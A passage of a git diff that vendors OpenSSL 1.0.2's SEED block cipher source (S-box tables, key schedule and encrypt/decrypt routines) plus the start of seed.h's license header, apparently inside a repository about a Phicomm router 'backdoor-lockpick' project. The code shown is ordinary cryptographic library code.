+                                       0x25456164, 0x3acaf2f8,
+                                       0x23c3e3e0, 0x3989b1b8, 0x3181b1b0,
+                                       0x1f8f939c, 0x1e4e525c, 0x39c9f1f8,
+                                       0x26c6e2e4, 0x3282b2b0,
+                                       0x31013130, 0x2acae2e8, 0x2d4d616c,
+                                       0x1f4f535c, 0x24c4e0e4, 0x30c0f0f0,
+                                       0x0dcdc1cc, 0x08888088,
+                                       0x16061214, 0x3a0a3238, 0x18485058,
+                                       0x14c4d0d4, 0x22426260, 0x29092128,
+                                       0x07070304, 0x33033330,
+                                       0x28c8e0e8, 0x1b0b1318, 0x05050104,
+                                       0x39497178, 0x10809090, 0x2a4a6268,
+                                       0x2a0a2228, 0x1a8a9298}, {
+                                                                 0x38380830,
+                                                                 0xe828c8e0,
+                                                                 0x2c2d0d21,
+                                                                 0xa42686a2,
+                                                                 0xcc0fcfc3,
+                                                                 0xdc1eced2,
+                                                                 0xb03383b3,
+                                                                 0xb83888b0,
+                                                                 0xac2f8fa3,
+                                                                 0x60204060,
+                                                                 0x54154551,
+                                                                 0xc407c7c3,
+                                                                 0x44044440,
+                                                                 0x6c2f4f63,
+                                                                 0x682b4b63,
+                                                                 0x581b4b53,
+                                                                 0xc003c3c3,
+                                                                 0x60224262,
+                                                                 0x30330333,
+                                                                 0xb43585b1,
+                                                                 0x28290921,
+                                                                 0xa02080a0,
+                                                                 0xe022c2e2,
+                                                                 0xa42787a3,
+                                                                 0xd013c3d3,
+                                                                 0x90118191,
+                                                                 0x10110111,
+                                                                 0x04060602,
+                                                                 0x1c1c0c10,
+                                                                 0xbc3c8cb0,
+                                                                 0x34360632,
+                                                                 0x480b4b43,
+                                                                 0xec2fcfe3,
+                                                                 0x88088880,
+                                                                 0x6c2c4c60,
+                                                                 0xa82888a0,
+                                                                 0x14170713,
+                                                                 0xc404c4c0,
+                                                                 0x14160612,
+                                                                 0xf434c4f0,
+                                                                 0xc002c2c2,
+                                                                 0x44054541,
+                                                                 0xe021c1e1,
+                                                                 0xd416c6d2,
+                                                                 0x3c3f0f33,
+                                                                 0x3c3d0d31,
+                                                                 0x8c0e8e82,
+                                                                 0x98188890,
+                                                                 0x28280820,
+                                                                 0x4c0e4e42,
+                                                                 0xf436c6f2,
+                                                                 0x3c3e0e32,
+                                                                 0xa42585a1,
+                                                                 0xf839c9f1,
+                                                                 0x0c0d0d01,
+                                                                 0xdc1fcfd3,
+                                                                 0xd818c8d0,
+                                                                 0x282b0b23,
+                                                                 0x64264662,
+                                                                 0x783a4a72,
+                                                                 0x24270723,
+                                                                 0x2c2f0f23,
+                                                                 0xf031c1f1,
+                                                                 0x70324272,
+                                                                 0x40024242,
+                                                                 0xd414c4d0,
+                                                                 0x40014141,
+                                                                 0xc000c0c0,
+                                                                 0x70334373,
+                                                                 0x64274763,
+                                                                 0xac2c8ca0,
+                                                                 0x880b8b83,
+                                                                 0xf437c7f3,
+                                                                 0xac2d8da1,
+                                                                 0x80008080,
+                                                                 0x1c1f0f13,
+                                                                 0xc80acac2,
+                                                                 0x2c2c0c20,
+                                                                 0xa82a8aa2,
+                                                                 0x34340430,
+                                                                 0xd012c2d2,
+                                                                 0x080b0b03,
+                                                                 0xec2ecee2,
+                                                                 0xe829c9e1,
+                                                                 0x5c1d4d51,
+                                                                 0x94148490,
+                                                                 0x18180810,
+                                                                 0xf838c8f0,
+                                                                 0x54174753,
+                                                                 0xac2e8ea2,
+                                                                 0x08080800,
+                                                                 0xc405c5c1,
+                                                                 0x10130313,
+                                                                 0xcc0dcdc1,
+                                                                 0x84068682,
+                                                                 0xb83989b1,
+                                                                 0xfc3fcff3,
+                                                                 0x7c3d4d71,
+                                                                 0xc001c1c1,
+                                                                 0x30310131,
+                                                                 0xf435c5f1,
+                                                                 0x880a8a82,
+                                                                 0x682a4a62,
+                                                                 0xb03181b1,
+                                                                 0xd011c1d1,
+                                                                 0x20200020,
+                                                                 0xd417c7d3,
+                                                                 0x00020202,
+                                                                 0x20220222,
+                                                                 0x04040400,
+                                                                 0x68284860,
+                                                                 0x70314171,
+                                                                 0x04070703,
+                                                                 0xd81bcbd3,
+                                                                 0x9c1d8d91,
+                                                                 0x98198991,
+                                                                 0x60214161,
+                                                                 0xbc3e8eb2,
+                                                                 0xe426c6e2,
+                                                                 0x58194951,
+                                                                 0xdc1dcdd1,
+                                                                 0x50114151,
+                                                                 0x90108090,
+                                                                 0xdc1cccd0,
+                                                                 0x981a8a92,
+                                                                 0xa02383a3,
+                                                                 0xa82b8ba3,
+                                                                 0xd010c0d0,
+                                                                 0x80018181,
+                                                                 0x0c0f0f03,
+                                                                 0x44074743,
+                                                                 0x181a0a12,
+                                                                 0xe023c3e3,
+                                                                 0xec2ccce0,
+                                                                 0x8c0d8d81,
+                                                                 0xbc3f8fb3,
+                                                                 0x94168692,
+                                                                 0x783b4b73,
+                                                                 0x5c1c4c50,
+                                                                 0xa02282a2,
+                                                                 0xa02181a1,
+                                                                 0x60234363,
+                                                                 0x20230323,
+                                                                 0x4c0d4d41,
+                                                                 0xc808c8c0,
+                                                                 0x9c1e8e92,
+                                                                 0x9c1c8c90,
+                                                                 0x383a0a32,
+                                                                 0x0c0c0c00,
+                                                                 0x2c2e0e22,
+                                                                 0xb83a8ab2,
+                                                                 0x6c2e4e62,
+                                                                 0x9c1f8f93,
+                                                                 0x581a4a52,
+                                                                 0xf032c2f2,
+                                                                 0x90128292,
+                                                                 0xf033c3f3,
+                                                                 0x48094941,
+                                                                 0x78384870,
+                                                                 0xcc0cccc0,
+                                                                 0x14150511,
+                                                                 0xf83bcbf3,
+                                                                 0x70304070,
+                                                                 0x74354571,
+                                                                 0x7c3f4f73,
+                                                                 0x34350531,
+                                                                 0x10100010,
+                                                                 0x00030303,
+                                                                 0x64244460,
+                                                                 0x6c2d4d61,
+                                                                 0xc406c6c2,
+                                                                 0x74344470,
+                                                                 0xd415c5d1,
+                                                                 0xb43484b0,
+                                                                 0xe82acae2,
+                                                                 0x08090901,
+                                                                 0x74364672,
+                                                                 0x18190911,
+                                                                 0xfc3ecef2,
+                                                                 0x40004040,
+                                                                 0x10120212,
+                                                                 0xe020c0e0,
+                                                                 0xbc3d8db1,
+                                                                 0x04050501,
+                                                                 0xf83acaf2,
+                                                                 0x00010101,
+                                                                 0xf030c0f0,
+                                                                 0x282a0a22,
+                                                                 0x5c1e4e52,
+                                                                 0xa82989a1,
+                                                                 0x54164652,
+                                                                 0x40034343,
+                                                                 0x84058581,
+                                                                 0x14140410,
+                                                                 0x88098981,
+                                                                 0x981b8b93,
+                                                                 0xb03080b0,
+                                                                 0xe425c5e1,
+                                                                 0x48084840,
+                                                                 0x78394971,
+                                                                 0x94178793,
+                                                                 0xfc3cccf0,
+                                                                 0x1c1e0e12,
+                                                                 0x80028282,
+                                                                 0x20210121,
+                                                                 0x8c0c8c80,
+                                                                 0x181b0b13,
+                                                                 0x5c1f4f53,
+                                                                 0x74374773,
+                                                                 0x54144450,
+                                                                 0xb03282b2,
+                                                                 0x1c1d0d11,
+                                                                 0x24250521,
+                                                                 0x4c0f4f43,
+                                                                 0x00000000,
+                                                                 0x44064642,
+                                                                 0xec2dcde1,
+                                                                 0x58184850,
+                                                                 0x50124252,
+                                                                 0xe82bcbe3,
+                                                                 0x7c3e4e72,
+                                                                 0xd81acad2,
+                                                                 0xc809c9c1,
+                                                                 0xfc3dcdf1,
+                                                                 0x30300030,
+                                                                 0x94158591,
+                                                                 0x64254561,
+                                                                 0x3c3c0c30,
+                                                                 0xb43686b2,
+                                                                 0xe424c4e0,
+                                                                 0xb83b8bb3,
+                                                                 0x7c3c4c70,
+                                                                 0x0c0e0e02,
+                                                                 0x50104050,
+                                                                 0x38390931,
+                                                                 0x24260622,
+                                                                 0x30320232,
+                                                                 0x84048480,
+                                                                 0x68294961,
+                                                                 0x90138393,
+                                                                 0x34370733,
+                                                                 0xe427c7e3,
+                                                                 0x24240420,
+                                                                 0xa42484a0,
+                                                                 0xc80bcbc3,
+                                                                 0x50134353,
+                                                                 0x080a0a02,
+                                                                 0x84078783,
+                                                                 0xd819c9d1,
+                                                                 0x4c0c4c40,
+                                                                 0x80038383,
+                                                                 0x8c0f8f83,
+                                                                 0xcc0ecec2,
+                                                                 0x383b0b33,
+                                                                 0x480a4a42,
+                                                                 0xb43787b3},
+{
+ 0xa1a82989, 0x81840585, 0xd2d416c6, 0xd3d013c3, 0x50541444, 0x111c1d0d,
+ 0xa0ac2c8c, 0x21242505,
+ 0x515c1d4d, 0x43400343, 0x10181808, 0x121c1e0e, 0x51501141, 0xf0fc3ccc,
+ 0xc2c80aca, 0x63602343,
+ 0x20282808, 0x40440444, 0x20202000, 0x919c1d8d, 0xe0e020c0, 0xe2e022c2,
+ 0xc0c808c8, 0x13141707,
+ 0xa1a42585, 0x838c0f8f, 0x03000303, 0x73783b4b, 0xb3b83b8b, 0x13101303,
+ 0xd2d012c2, 0xe2ec2ece,
+ 0x70703040, 0x808c0c8c, 0x333c3f0f, 0xa0a82888, 0x32303202, 0xd1dc1dcd,
+ 0xf2f436c6, 0x70743444,
+ 0xe0ec2ccc, 0x91941585, 0x03080b0b, 0x53541747, 0x505c1c4c, 0x53581b4b,
+ 0xb1bc3d8d, 0x01000101,
+ 0x20242404, 0x101c1c0c, 0x73703343, 0x90981888, 0x10101000, 0xc0cc0ccc,
+ 0xf2f032c2, 0xd1d819c9,
+ 0x202c2c0c, 0xe3e427c7, 0x72703242, 0x83800383, 0x93981b8b, 0xd1d011c1,
+ 0x82840686, 0xc1c809c9,
+ 0x60602040, 0x50501040, 0xa3a02383, 0xe3e82bcb, 0x010c0d0d, 0xb2b43686,
+ 0x929c1e8e, 0x434c0f4f,
+ 0xb3b43787, 0x52581a4a, 0xc2c406c6, 0x70783848, 0xa2a42686, 0x12101202,
+ 0xa3ac2f8f, 0xd1d415c5,
+ 0x61602141, 0xc3c003c3, 0xb0b43484, 0x41400141, 0x52501242, 0x717c3d4d,
+ 0x818c0d8d, 0x00080808,
+ 0x131c1f0f, 0x91981989, 0x00000000, 0x11181909, 0x00040404, 0x53501343,
+ 0xf3f437c7, 0xe1e021c1,
+ 0xf1fc3dcd, 0x72743646, 0x232c2f0f, 0x23242707, 0xb0b03080, 0x83880b8b,
+ 0x020c0e0e, 0xa3a82b8b,
+ 0xa2a02282, 0x626c2e4e, 0x93901383, 0x414c0d4d, 0x61682949, 0x707c3c4c,
+ 0x01080909, 0x02080a0a,
+ 0xb3bc3f8f, 0xe3ec2fcf, 0xf3f033c3, 0xc1c405c5, 0x83840787, 0x10141404,
+ 0xf2fc3ece, 0x60642444,
+ 0xd2dc1ece, 0x222c2e0e, 0x43480b4b, 0x12181a0a, 0x02040606, 0x21202101,
+ 0x63682b4b, 0x62642646,
+ 0x02000202, 0xf1f435c5, 0x92901282, 0x82880a8a, 0x000c0c0c, 0xb3b03383,
+ 0x727c3e4e, 0xd0d010c0,
+ 0x72783a4a, 0x43440747, 0x92941686, 0xe1e425c5, 0x22242606, 0x80800080,
+ 0xa1ac2d8d, 0xd3dc1fcf,
+ 0xa1a02181, 0x30303000, 0x33343707, 0xa2ac2e8e, 0x32343606, 0x11141505,
+ 0x22202202, 0x30383808,
+ 0xf0f434c4, 0xa3a42787, 0x41440545, 0x404c0c4c, 0x81800181, 0xe1e829c9,
+ 0x80840484, 0x93941787,
+ 0x31343505, 0xc3c80bcb, 0xc2cc0ece, 0x303c3c0c, 0x71703141, 0x11101101,
+ 0xc3c407c7, 0x81880989,
+ 0x71743545, 0xf3f83bcb, 0xd2d81aca, 0xf0f838c8, 0x90941484, 0x51581949,
+ 0x82800282, 0xc0c404c4,
+ 0xf3fc3fcf, 0x41480949, 0x31383909, 0x63642747, 0xc0c000c0, 0xc3cc0fcf,
+ 0xd3d417c7, 0xb0b83888,
+ 0x030c0f0f, 0x828c0e8e, 0x42400242, 0x23202303, 0x91901181, 0x606c2c4c,
+ 0xd3d81bcb, 0xa0a42484,
+ 0x30343404, 0xf1f031c1, 0x40480848, 0xc2c002c2, 0x636c2f4f, 0x313c3d0d,
+ 0x212c2d0d, 0x40400040,
+ 0xb2bc3e8e, 0x323c3e0e, 0xb0bc3c8c, 0xc1c001c1, 0xa2a82a8a, 0xb2b83a8a,
+ 0x424c0e4e, 0x51541545,
+ 0x33383b0b, 0xd0dc1ccc, 0x60682848, 0x737c3f4f, 0x909c1c8c, 0xd0d818c8,
+ 0x42480a4a, 0x52541646,
+ 0x73743747, 0xa0a02080, 0xe1ec2dcd, 0x42440646, 0xb1b43585, 0x23282b0b,
+ 0x61642545, 0xf2f83aca,
+ 0xe3e023c3, 0xb1b83989, 0xb1b03181, 0x939c1f8f, 0x525c1e4e, 0xf1f839c9,
+ 0xe2e426c6, 0xb2b03282,
+ 0x31303101, 0xe2e82aca, 0x616c2d4d, 0x535c1f4f, 0xe0e424c4, 0xf0f030c0,
+ 0xc1cc0dcd, 0x80880888,
+ 0x12141606, 0x32383a0a, 0x50581848, 0xd0d414c4, 0x62602242, 0x21282909,
+ 0x03040707, 0x33303303,
+ 0xe0e828c8, 0x13181b0b, 0x01040505, 0x71783949, 0x90901080, 0x62682a4a,
+ 0x22282a0a, 0x92981a8a}, {
+                           0x08303838, 0xc8e0e828, 0x0d212c2d, 0x86a2a426,
+                           0xcfc3cc0f, 0xced2dc1e, 0x83b3b033, 0x88b0b838,
+                           0x8fa3ac2f, 0x40606020, 0x45515415, 0xc7c3c407,
+                           0x44404404, 0x4f636c2f, 0x4b63682b, 0x4b53581b,
+                           0xc3c3c003, 0x42626022, 0x03333033, 0x85b1b435,
+                           0x09212829, 0x80a0a020, 0xc2e2e022, 0x87a3a427,
+                           0xc3d3d013, 0x81919011, 0x01111011, 0x06020406,
+                           0x0c101c1c, 0x8cb0bc3c, 0x06323436, 0x4b43480b,
+                           0xcfe3ec2f, 0x88808808, 0x4c606c2c, 0x88a0a828,
+                           0x07131417, 0xc4c0c404, 0x06121416, 0xc4f0f434,
+                           0xc2c2c002, 0x45414405, 0xc1e1e021, 0xc6d2d416,
+                           0x0f333c3f, 0x0d313c3d, 0x8e828c0e, 0x88909818,
+                           0x08202828, 0x4e424c0e, 0xc6f2f436, 0x0e323c3e,
+                           0x85a1a425, 0xc9f1f839, 0x0d010c0d, 0xcfd3dc1f,
+                           0xc8d0d818, 0x0b23282b, 0x46626426, 0x4a72783a,
+                           0x07232427, 0x0f232c2f, 0xc1f1f031, 0x42727032,
+                           0x42424002, 0xc4d0d414, 0x41414001, 0xc0c0c000,
+                           0x43737033, 0x47636427, 0x8ca0ac2c, 0x8b83880b,
+                           0xc7f3f437, 0x8da1ac2d, 0x80808000, 0x0f131c1f,
+                           0xcac2c80a, 0x0c202c2c, 0x8aa2a82a, 0x04303434,
+                           0xc2d2d012, 0x0b03080b, 0xcee2ec2e, 0xc9e1e829,
+                           0x4d515c1d, 0x84909414, 0x08101818, 0xc8f0f838,
+                           0x47535417, 0x8ea2ac2e, 0x08000808, 0xc5c1c405,
+                           0x03131013, 0xcdc1cc0d, 0x86828406, 0x89b1b839,
+                           0xcff3fc3f, 0x4d717c3d, 0xc1c1c001, 0x01313031,
+                           0xc5f1f435, 0x8a82880a, 0x4a62682a, 0x81b1b031,
+                           0xc1d1d011, 0x00202020, 0xc7d3d417, 0x02020002,
+                           0x02222022, 0x04000404, 0x48606828, 0x41717031,
+                           0x07030407, 0xcbd3d81b, 0x8d919c1d, 0x89919819,
+                           0x41616021, 0x8eb2bc3e, 0xc6e2e426, 0x49515819,
+                           0xcdd1dc1d, 0x41515011, 0x80909010, 0xccd0dc1c,
+                           0x8a92981a, 0x83a3a023, 0x8ba3a82b, 0xc0d0d010,
+                           0x81818001, 0x0f030c0f, 0x47434407, 0x0a12181a,
+                           0xc3e3e023, 0xcce0ec2c, 0x8d818c0d, 0x8fb3bc3f,
+                           0x86929416, 0x4b73783b, 0x4c505c1c, 0x82a2a022,
+                           0x81a1a021, 0x43636023, 0x03232023, 0x4d414c0d,
+                           0xc8c0c808, 0x8e929c1e, 0x8c909c1c, 0x0a32383a,
+                           0x0c000c0c, 0x0e222c2e, 0x8ab2b83a, 0x4e626c2e,
+                           0x8f939c1f, 0x4a52581a, 0xc2f2f032, 0x82929012,
+                           0xc3f3f033, 0x49414809, 0x48707838, 0xccc0cc0c,
+                           0x05111415, 0xcbf3f83b, 0x40707030, 0x45717435,
+                           0x4f737c3f, 0x05313435, 0x00101010, 0x03030003,
+                           0x44606424, 0x4d616c2d, 0xc6c2c406, 0x44707434,
+                           0xc5d1d415, 0x84b0b434, 0xcae2e82a, 0x09010809,
+                           0x46727436, 0x09111819, 0xcef2fc3e, 0x40404000,
+                           0x02121012, 0xc0e0e020, 0x8db1bc3d, 0x05010405,
+                           0xcaf2f83a, 0x01010001, 0xc0f0f030, 0x0a22282a,
+                           0x4e525c1e, 0x89a1a829, 0x46525416, 0x43434003,
+                           0x85818405, 0x04101414, 0x89818809, 0x8b93981b,
+                           0x80b0b030, 0xc5e1e425, 0x48404808, 0x49717839,
+                           0x87939417, 0xccf0fc3c, 0x0e121c1e, 0x82828002,
+                           0x01212021, 0x8c808c0c, 0x0b13181b, 0x4f535c1f,
+                           0x47737437, 0x44505414, 0x82b2b032, 0x0d111c1d,
+                           0x05212425, 0x4f434c0f, 0x00000000, 0x46424406,
+                           0xcde1ec2d, 0x48505818, 0x42525012, 0xcbe3e82b,
+                           0x4e727c3e, 0xcad2d81a, 0xc9c1c809, 0xcdf1fc3d,
+                           0x00303030, 0x85919415, 0x45616425, 0x0c303c3c,
+                           0x86b2b436, 0xc4e0e424, 0x8bb3b83b, 0x4c707c3c,
+                           0x0e020c0e, 0x40505010, 0x09313839, 0x06222426,
+                           0x02323032, 0x84808404, 0x49616829, 0x83939013,
+                           0x07333437, 0xc7e3e427, 0x04202424, 0x84a0a424,
+                           0xcbc3c80b, 0x43535013, 0x0a02080a, 0x87838407,
+                           0xc9d1d819, 0x4c404c0c, 0x83838003, 0x8f838c0f,
+                           0xcec2cc0e, 0x0b33383b, 0x4a42480a, 0x87b3b437}
+};
+
+/* key schedule constants - golden ratio */
+# define KC0     0x9e3779b9
+# define KC1     0x3c6ef373
+# define KC2     0x78dde6e6
+# define KC3     0xf1bbcdcc
+# define KC4     0xe3779b99
+# define KC5     0xc6ef3733
+# define KC6     0x8dde6e67
+# define KC7     0x1bbcdccf
+# define KC8     0x3779b99e
+# define KC9     0x6ef3733c
+# define KC10    0xdde6e678
+# define KC11    0xbbcdccf1
+# define KC12    0x779b99e3
+# define KC13    0xef3733c6
+# define KC14    0xde6e678d
+# define KC15    0xbcdccf1b
+
+# if defined(OPENSSL_SMALL_FOOTPRINT)
+static const seed_word KC[] = {
+    KC0, KC1, KC2, KC3, KC4, KC5, KC6, KC7,
+    KC8, KC9, KC10, KC11, KC12, KC13, KC14, KC15
+};
+# endif
+void SEED_set_key(const unsigned char rawkey[SEED_KEY_LENGTH],
+                  SEED_KEY_SCHEDULE *ks)
+# ifdef OPENSSL_FIPS
+{
+    fips_cipher_abort(SEED);
+    private_SEED_set_key(rawkey, ks);
+}
+
+void private_SEED_set_key(const unsigned char rawkey[SEED_KEY_LENGTH],
+                          SEED_KEY_SCHEDULE *ks)
+# endif
+{
+    seed_word x1, x2, x3, x4;
+    seed_word t0, t1;
+
+    char2word(rawkey, x1);
+    char2word(rawkey + 4, x2);
+    char2word(rawkey + 8, x3);
+    char2word(rawkey + 12, x4);
+
+    t0 = (x1 + x3 - KC0) & 0xffffffff;
+    t1 = (x2 - x4 + KC0) & 0xffffffff;
+    KEYUPDATE_TEMP(t0, t1, &ks->data[0]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC1);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[2]);
+
+# if !defined(OPENSSL_SMALL_FOOTPRINT)
+    KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC2);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[4]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC3);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[6]);
+    KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC4);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[8]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC5);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[10]);
+    KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC6);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[12]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC7);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[14]);
+    KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC8);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[16]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC9);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[18]);
+    KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC10);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[20]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC11);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[22]);
+    KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC12);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[24]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC13);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[26]);
+    KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC14);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[28]);
+    KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC15);
+    KEYUPDATE_TEMP(t0, t1, &ks->data[30]);
+# else
+    {
+        int i;
+        for (i = 2; i < 16; i += 2) {
+            KEYSCHEDULE_UPDATE0(t0, t1, x1, x2, x3, x4, KC[i]);
+            KEYUPDATE_TEMP(t0, t1, &ks->data[i * 2]);
+            KEYSCHEDULE_UPDATE1(t0, t1, x1, x2, x3, x4, KC[i + 1]);
+            KEYUPDATE_TEMP(t0, t1, &ks->data[i * 2 + 2]);
+        }
+    }
+# endif
+}
+
+void SEED_encrypt(const unsigned char s[SEED_BLOCK_SIZE],
+                  unsigned char d[SEED_BLOCK_SIZE],
+                  const SEED_KEY_SCHEDULE *ks)
+{
+    seed_word x1, x2, x3, x4;
+    seed_word t0, t1;
+
+    char2word(s, x1);
+    char2word(s + 4, x2);
+    char2word(s + 8, x3);
+    char2word(s + 12, x4);
+
+# if !defined(OPENSSL_SMALL_FOOTPRINT)
+    E_SEED(t0, t1, x1, x2, x3, x4, 0);
+    E_SEED(t0, t1, x3, x4, x1, x2, 2);
+    E_SEED(t0, t1, x1, x2, x3, x4, 4);
+    E_SEED(t0, t1, x3, x4, x1, x2, 6);
+    E_SEED(t0, t1, x1, x2, x3, x4, 8);
+    E_SEED(t0, t1, x3, x4, x1, x2, 10);
+    E_SEED(t0, t1, x1, x2, x3, x4, 12);
+    E_SEED(t0, t1, x3, x4, x1, x2, 14);
+    E_SEED(t0, t1, x1, x2, x3, x4, 16);
+    E_SEED(t0, t1, x3, x4, x1, x2, 18);
+    E_SEED(t0, t1, x1, x2, x3, x4, 20);
+    E_SEED(t0, t1, x3, x4, x1, x2, 22);
+    E_SEED(t0, t1, x1, x2, x3, x4, 24);
+    E_SEED(t0, t1, x3, x4, x1, x2, 26);
+    E_SEED(t0, t1, x1, x2, x3, x4, 28);
+    E_SEED(t0, t1, x3, x4, x1, x2, 30);
+# else
+    {
+        int i;
+        for (i = 0; i < 30; i += 4) {
+            E_SEED(t0, t1, x1, x2, x3, x4, i);
+            E_SEED(t0, t1, x3, x4, x1, x2, i + 2);
+        }
+    }
+# endif
+
+    word2char(x3, d);
+    word2char(x4, d + 4);
+    word2char(x1, d + 8);
+    word2char(x2, d + 12);
+}
+
+void SEED_decrypt(const unsigned char s[SEED_BLOCK_SIZE],
+                  unsigned char d[SEED_BLOCK_SIZE],
+                  const SEED_KEY_SCHEDULE *ks)
+{
+    seed_word x1, x2, x3, x4;
+    seed_word t0, t1;
+
+    char2word(s, x1);
+    char2word(s + 4, x2);
+    char2word(s + 8, x3);
+    char2word(s + 12, x4);
+
+# if !defined(OPENSSL_SMALL_FOOTPRINT)
+    E_SEED(t0, t1, x1, x2, x3, x4, 30);
+    E_SEED(t0, t1, x3, x4, x1, x2, 28);
+    E_SEED(t0, t1, x1, x2, x3, x4, 26);
+    E_SEED(t0, t1, x3, x4, x1, x2, 24);
+    E_SEED(t0, t1, x1, x2, x3, x4, 22);
+    E_SEED(t0, t1, x3, x4, x1, x2, 20);
+    E_SEED(t0, t1, x1, x2, x3, x4, 18);
+    E_SEED(t0, t1, x3, x4, x1, x2, 16);
+    E_SEED(t0, t1, x1, x2, x3, x4, 14);
+    E_SEED(t0, t1, x3, x4, x1, x2, 12);
+    E_SEED(t0, t1, x1, x2, x3, x4, 10);
+    E_SEED(t0, t1, x3, x4, x1, x2, 8);
+    E_SEED(t0, t1, x1, x2, x3, x4, 6);
+    E_SEED(t0, t1, x3, x4, x1, x2, 4);
+    E_SEED(t0, t1, x1, x2, x3, x4, 2);
+    E_SEED(t0, t1, x3, x4, x1, x2, 0);
+# else
+    {
+        int i;
+        for (i = 30; i > 0; i -= 4) {
+            E_SEED(t0, t1, x1, x2, x3, x4, i);
+            E_SEED(t0, t1, x3, x4, x1, x2, i - 2);
+
+        }
+    }
+# endif
+
+    word2char(x3, d);
+    word2char(x4, d + 4);
+    word2char(x1, d + 8);
+    word2char(x2, d + 12);
+}
+
+#endif                          /* OPENSSL_NO_SEED */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.h
new file mode 100644
index 0000000..8cbf0d9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.h
@@ -0,0 +1,149 @@
+/*
+ * Copyright (c) 2007 KISA(Korea Information Security Agency). All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Neither the name of author nor the names of its contributors may
+ *    be used to endorse or promote products derived from this software
+ *    without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
